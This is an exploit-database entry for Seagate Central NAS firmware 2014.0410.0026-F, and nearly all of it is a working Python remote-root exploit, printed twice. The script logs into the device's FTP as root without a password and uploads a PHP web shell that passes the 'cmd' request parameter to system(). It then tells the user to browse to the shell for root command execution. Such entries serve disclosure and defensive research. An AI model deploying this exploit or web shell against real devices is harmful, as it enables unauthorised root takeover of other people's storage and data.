Search...

Seagate Central 2014.0410.0026-F - Remote Command Execution

2015-06-03T00:00:00

ID EXPLOITPACK:DA5F6EF1B355CC6D15D3E1FEFC3D2F36
Type exploitpack
Reporter Jeremy Brown
Modified 2015-06-03T00:00:00

Description

Seagate Central 2014.0410.0026-F - Remote Command Execution

                                        
                                            #!/usr/bin/python
# seagate_ftp_remote_root.py
#
# Seagate Central Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# May 2015
#
# -Synopsis-
#
# Seagate Central by default has a passwordless root account (and no option to change it).
# One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.
# From there, we can execute commands with root privileges as lighttpd is also running as root.
#
# -Fixes-
#
# Seagate scheduled it's updates to go live on April 28th, 2015.
#
# Tested Firmware Version: 2014.0410.0026-F
#

import sys
from ftplib import FTP

port = 21

php_shell = """
&lt;?php
if(isset($_REQUEST['cmd']))
{
    $cmd = ($_REQUEST["cmd"]);
    echo "&lt;pre&gt;$cmd&lt;/pre&gt;";
    system($cmd);
}
?&gt;
"""

php_shell_filename = "shell.php"
seagate_central_webroot = "/cirrus/"

def main():
    if(len(sys.argv) &lt; 2):
        print("Usage: %s &lt;host&gt;" % sys.argv[0])
        return

    host = sys.argv[1]

    try:
        with open(php_shell_filename, 'w') as file:
            file.write(php_shell)

    except Exception as error:
        print("Error: %s" % error);
        return

    try:
        ftp = FTP(host)
        ftp.login("root")
        ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb'))
        ftp.close()
    
    except Exception as error:
        print("Error: %s" % error);
        return

    print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename))

    return

if __name__ == "__main__":
    main()

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:47", "references": [], "description": "\nSeagate Central 2014.0410.0026-F - Remote Command Execution", "edition": 1, "reporter": "Jeremy Brown", "exploitpack": {"type": "remote", "platform": "hardware"}, "published": "2015-06-03T00:00:00", "title": "Seagate Central 2014.0410.0026-F - Remote Command Execution", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-06-03T00:00:00", "id": "EXPLOITPACK:DA5F6EF1B355CC6D15D3E1FEFC3D2F36", "href": "", "viewCount": 2, "sourceData": "#!/usr/bin/python\n# seagate_ftp_remote_root.py\n#\n# Seagate Central Remote Root Exploit\n#\n# Jeremy Brown [jbrown3264/gmail]\n# May 2015\n#\n# -Synopsis-\n#\n# Seagate Central by default has a passwordless root account (and no option to change it).\n# One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.\n# From there, we can execute commands with root privileges as lighttpd is also running as root.\n#\n# -Fixes-\n#\n# Seagate scheduled it's updates to go live on April 28th, 2015.\n#\n# Tested Firmware Version: 2014.0410.0026-F\n#\n\nimport sys\nfrom ftplib import FTP\n\nport = 21\n\nphp_shell = \"\"\"\n<?php\nif(isset($_REQUEST['cmd']))\n{\n $cmd = ($_REQUEST[\"cmd\"]);\n echo \"<pre>$cmd</pre>\";\n system($cmd);\n}\n?>\n\"\"\"\n\nphp_shell_filename = \"shell.php\"\nseagate_central_webroot = \"/cirrus/\"\n\ndef main():\n if(len(sys.argv) < 2):\n print(\"Usage: %s <host>\" % sys.argv[0])\n return\n\n host = sys.argv[1]\n\n try:\n with open(php_shell_filename, 'w') as file:\n file.write(php_shell)\n\n except Exception as error:\n print(\"Error: %s\" % error);\n return\n\n try:\n ftp = FTP(host)\n ftp.login(\"root\")\n ftp.storbinary(\"STOR \" + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb'))\n ftp.close()\n \n except Exception as error:\n print(\"Error: %s\" % error);\n return\n\n print(\"Now surf on over to http://%s%s%s for the php root shell\" % (host, seagate_central_webroot, php_shell_filename))\n\n return\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645611225}}